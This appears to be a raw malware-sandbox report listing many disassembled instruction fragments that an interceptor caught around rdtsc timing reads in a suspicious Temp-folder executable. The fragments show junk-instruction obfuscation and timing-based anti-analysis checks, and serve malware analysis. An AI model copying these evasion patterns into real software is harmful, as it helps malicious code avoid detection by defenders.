Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1C18 second address: DE1C3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC4CC910586h 0x00000009 jmp 00007FC4CC91058Dh 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007FC4CC910586h 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1C3B second address: DE1C3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1F0F second address: DE1F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC4CC91058Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1F27 second address: DE1F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE2384 second address: DE23A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910599h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE24F1 second address: DE24FB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC4CCEF6AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE32E2 second address: DE32FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC4CC910596h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE32FF second address: DE3314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 jno 00007FC4CCEF6AD6h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE9F80 second address: DE9F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE9F84 second address: DE9F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE9F88 second address: DE9F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC4CC91058Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE9F9E second address: DE9FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF71E2 second address: DF71EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF71EB second address: DF71F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF6C8B second address: DF6CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC4CC910592h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF6CA4 second address: DF6CAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF6CAA second address: DF6CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FC4CC910586h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF6CB6 second address: DF6CBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF97F3 second address: DF97FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF97FB second address: DF9805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF9805 second address: DF980D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF9659 second address: DF965F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF965F second address: DF9665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF9665 second address: DF9673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CCEF6ADAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DFD07B second address: DFD08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FC4CC91058Eh 0x0000000b jp 00007FC4CC910586h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DFD08E second address: DFD096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DFD096 second address: DFD09A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DFCC4A second address: DFCC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E0441A second address: E0441F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E0441F second address: E04424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E04424 second address: E0442A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E0442A second address: E04430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E0CBAA second address: E0CBCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC4CC910599h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E0CBCB second address: E0CBDD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC4CCEF6AD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E0CBDD second address: E0CBEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E13EDE second address: E13EF3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC4CCEF6AD8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FC4CCEF6AD6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E13EF3 second address: E13F10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC4CC910592h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E129AD second address: E129D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FC4CCEF6AE0h 0x0000000f jbe 00007FC4CCEF6AD6h 0x00000015 jmp 00007FC4CCEF6ADAh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E182EF second address: E18328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC4CC910596h 0x0000000c pushad 0x0000000d jmp 00007FC4CC910599h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E184B4 second address: E184BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E26D19 second address: E26D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E28F09 second address: E28F0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E366AC second address: E366B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E366B3 second address: E366C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC4CCEF6ADAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90113 second address: 4D90119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90119 second address: 4D901E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC4CCEF6AE9h 0x0000000e xchg eax, ecx 0x0000000f jmp 00007FC4CCEF6ADEh 0x00000014 xchg eax, ebx 0x00000015 pushad 0x00000016 mov ecx, 3705B04Dh 0x0000001b pushad 0x0000001c mov ah, C2h 0x0000001e call 00007FC4CCEF6AE5h 0x00000023 pop esi 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007FC4CCEF6ADEh 0x0000002c xchg eax, ebx 0x0000002d pushad 0x0000002e jmp 00007FC4CCEF6ADEh 0x00000033 pushfd 0x00000034 jmp 00007FC4CCEF6AE2h 0x00000039 jmp 00007FC4CCEF6AE5h 0x0000003e popfd 0x0000003f popad 0x00000040 mov ebx, dword ptr [ebp+10h] 0x00000043 jmp 00007FC4CCEF6ADEh 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FC4CCEF6AE7h 0x00000050 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D901E0 second address: 4D9029A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC4CC910597h 0x00000011 or cx, 24DEh 0x00000016 jmp 00007FC4CC910599h 0x0000001b popfd 0x0000001c mov ecx, 2BEA93A7h 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 jmp 00007FC4CC91058Ah 0x00000028 mov esi, dword ptr [ebp+08h] 0x0000002b jmp 00007FC4CC910590h 0x00000030 xchg eax, edi 0x00000031 pushad 0x00000032 mov dl, cl 0x00000034 pushfd 0x00000035 jmp 00007FC4CC910593h 0x0000003a adc esi, 66376C4Eh 0x00000040 jmp 00007FC4CC910599h 0x00000045 popfd 0x00000046 popad 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D9029A second address: 4D9029E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D9029E second address: 4D902A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902A2 second address: 4D902A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902A8 second address: 4D902AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902AE second address: 4D902D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902D2 second address: 4D902D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902D8 second address: 4D902DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902DE second address: 4D902E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D902E2 second address: 4D90327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FC4CCEF6AE0h 0x0000000f je 00007FC53F514DEFh 0x00000015 jmp 00007FC4CCEF6AE0h 0x0000001a cmp dword ptr [esi+08h], DDEEDDEEh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC4CCEF6ADAh 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90327 second address: 4D90336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC91058Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90336 second address: 4D90368 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC53F514DAEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC4CCEF6ADDh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90368 second address: 4D90410 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, EE42h 0x00000007 pushfd 0x00000008 jmp 00007FC4CC910593h 0x0000000d add ah, 0000003Eh 0x00000010 jmp 00007FC4CC910599h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov edx, dword ptr [esi+44h] 0x0000001c jmp 00007FC4CC91058Eh 0x00000021 or edx, dword ptr [ebp+0Ch] 0x00000024 jmp 00007FC4CC910590h 0x00000029 test edx, 61000000h 0x0000002f jmp 00007FC4CC910590h 0x00000034 jne 00007FC53EF2E831h 0x0000003a jmp 00007FC4CC910590h 0x0000003f test byte ptr [esi+48h], 00000001h 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FC4CC910597h 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90410 second address: 4D90416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D90416 second address: 4D90455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FC53EF2E809h 0x0000000e jmp 00007FC4CC910597h 0x00000013 test bl, 00000007h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC4CC910595h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80899 second address: 4D8089D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D8089D second address: 4D808B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D808B8 second address: 4D80912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC4CCEF6ADEh 0x00000010 and esp, FFFFFFF8h 0x00000013 jmp 00007FC4CCEF6AE0h 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC4CCEF6AE7h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80912 second address: 4D8092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CC910594h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D8092A second address: 4D8096F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov esi, ebx 0x0000000f mov di, BED6h 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 jmp 00007FC4CCEF6ADDh 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC4CCEF6AE8h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D8096F second address: 4D8097E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC91058Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D8097E second address: 4D80A2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC4CCEF6ADFh 0x00000008 pop ecx 0x00000009 call 00007FC4CCEF6AE9h 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007FC4CCEF6ADEh 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a mov ecx, 0F5D4E3Dh 0x0000001f mov bh, cl 0x00000021 popad 0x00000022 mov esi, dword ptr [ebp+08h] 0x00000025 jmp 00007FC4CCEF6AE5h 0x0000002a sub ebx, ebx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FC4CCEF6ADDh 0x00000033 or eax, 1787C5B6h 0x00000039 jmp 00007FC4CCEF6AE1h 0x0000003e popfd 0x0000003f mov bx, ax 0x00000042 popad 0x00000043 test esi, esi 0x00000045 jmp 00007FC4CCEF6ADAh 0x0000004a je 00007FC53F51C44Ch 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FC4CCEF6ADAh 0x00000059 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80A2C second address: 4D80A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80A32 second address: 4D80A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6ADEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007FC4CCEF6AE0h 0x00000015 mov ecx, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC4CCEF6AE7h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80A76 second address: 4D80AF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC53EF35E96h 0x0000000f jmp 00007FC4CC91058Eh 0x00000014 test byte ptr [77436968h], 00000002h 0x0000001b jmp 00007FC4CC910590h 0x00000020 jne 00007FC53EF35E7Eh 0x00000026 pushad 0x00000027 jmp 00007FC4CC91058Eh 0x0000002c movzx esi, bx 0x0000002f popad 0x00000030 mov edx, dword ptr [ebp+0Ch] 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC4CC910598h 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: 4D80AF4 second address: 4D80AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
